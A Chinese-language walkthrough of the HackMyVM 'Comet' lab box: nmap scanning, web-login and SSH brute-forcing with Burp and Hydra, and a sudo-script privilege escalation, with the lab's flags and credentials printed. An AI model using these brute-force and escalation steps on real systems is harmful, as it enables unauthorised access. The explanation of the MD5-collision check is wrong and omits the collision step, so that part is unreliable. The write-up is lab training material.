0x00 配置
攻击机 IP: 172.16.1.25
靶机 IP: 172.16.1.243
0x01 攻击
使用 Nmap 扫描目标靶机开放的端口
┌──(root㉿Kali-VM)-[~]
└─# nmap -sC -sV -p- 172.16.1.243
Starting Nmap 7.93 ( https://nmap.org )
Nmap scan report for 172.16.1.243
Host is up (0.00033s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 dbf946e520816ceec72508ab2251366c (RSA)
| 256 33c09564294723dd864ee6b8073367ad (ECDSA)
|_ 256 beaa6d4243dd7dd40e0d7478c189a136 (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-title: CyberArray
|_http-server-header: Apache/2.4.54 (Debian)
MAC Address: 08:00:27:31:3F:71 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.32 seconds
发现了 22 (SSH) 和 80 (HTTP) 端口,直接看 Web
在网站的评论区里发现了两个可疑的用户名: admin 和 owner
在网页的右上角发现了登录按钮
随便输入一个账号和密码,发现登录失败了,并且再次访问 login.php 的时候网页一直在加载,局域网中的其他电脑可以正常访问,猜测是 IP 地址被阻拦了
修改请求头中的 IP 才可以继续访问,这里直接导入 BurpSuite 伪造本地 IP 来爆破
在 payload 处导入 rockyou.txt,开始爆破
爆破成功后发现我们被重定向到了 /logFire 目录,发现了一堆 log 文件,检查之后发现都没什么用,但是还有一个二进制可执行文件 firewall_update
拖入 IDA 分析,发现这段代码的作用就是对比输入的文本的 SHA256 值是否和预定义的一样,使用 在线 SHA256 解密网站 成功解密了 SHA256
似乎得到了 SSH 的密码,用 hydra 工具爆破靶机的用户名
┌──(root㉿Kali-VM)-[~/work]
└─# hydra -L /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -p prettywoman ssh://172.16.1.243 -t 6 -V -f -I
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting
[DATA] max 6 tasks per 1 server, overall 6 tasks, 8295455 login tries (l:8295455/p:1), ~1382576 tries per task
[DATA] attacking ssh://172.16.1.243:22/
...
[22][ssh] host: 172.16.1.243 login: joe password: prettywoman
[STATUS] attack finished for 172.16.1.243 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished
得到了 SSH 用户名 joe,密码 prettywoman,尝试登录
[C:\~]$ ssh joe@172.16.1.243
Connecting to 172.16.1.243:22...
Connection established.
To escape to local shell, press Ctrl+Alt+].
Linux comet.hmv 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar 23 03:35:31 2023 from 172.16.1.102
joe@comet:~$
成功进入了 Shell,先获得 user flag
joe@comet:~$ ls -al
total 36
drwxr-xr-x 3 joe joe 4096 Mar 23 03:39 .
drwxr-xr-x 3 root root 4096 Feb 19 19:33 ..
lrwxrwxrwx 1 root root 9 Feb 25 17:03 .bash_history -> /dev/null
-rw-r--r-- 1 joe joe 220 Feb 19 10:51 .bash_logout
-rw-r--r-- 1 joe joe 3526 Feb 19 10:51 .bashrc
-rwxr-xr-x 1 root root 366 Feb 19 10:51 coll
drwxr-xr-x 3 joe joe 4096 Feb 19 10:51 .local
-rw-r--r-- 1 joe joe 807 Feb 19 10:51 .profile
-rwx------ 1 joe joe 33 Feb 19 10:51 user.txt
-rw------- 1 joe joe 55 Mar 23 03:39 .Xauthority
joe@comet:~$ cat user.txt
cc32dbc17ec3ddf89f9e6d0991c82616
检查一下具有 SUID 权限的文件
joe@comet:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/mount
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/umount
发现可以运行 Sudo,看看可以运行的命令
joe@comet:~$ sudo -l
Matching Defaults entries for joe on comet:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User joe may run the following commands on comet:
(ALL : ALL) NOPASSWD: /bin/bash /home/joe/coll
发现我们可以以 root 身份运行 /bin/bash /home/joe/coll,查看一下 /home/joe/coll 文件
#!/bin/bash
exec 2>/dev/null
file1=/home/joe/file1
file2=/home/joe/file2
md5_1=$(md5sum $file1 | awk '{print $1}')
md5_2=$(md5sum $file2 | awk '{print $1}')
if [[ $(head -n 1 $file1) == "HMV" ]] &&
[[ $(head -n 1 $file2) == "HMV" ]] &&
[[ $md5_1 == $md5_2 ]] &&
[[ $(diff -q $file1 $file2) ]]; then
chmod +s /bin/bash
exit 0
else
exit 1
fi
这段脚本会对比 /home/joe/file1 和 /home/joe/file2 以及它们的 MD5 值,如果 MD5 值的头部三个字母为 "HMV" 则会给 /bin/bash 权限供我们提权。这里的 MD5 值需要暴力破解出来
最后进入 root 后,得到 root flag
# root.txt
052cf26a6e7e33790391c0d869e2e40c
0x02 总结
纯爆破
标签:bin,1.243,HMV,joe,172.16,Comet,root,usr From: https://www.cnblogs.com/azwhikaru/p/17247037.html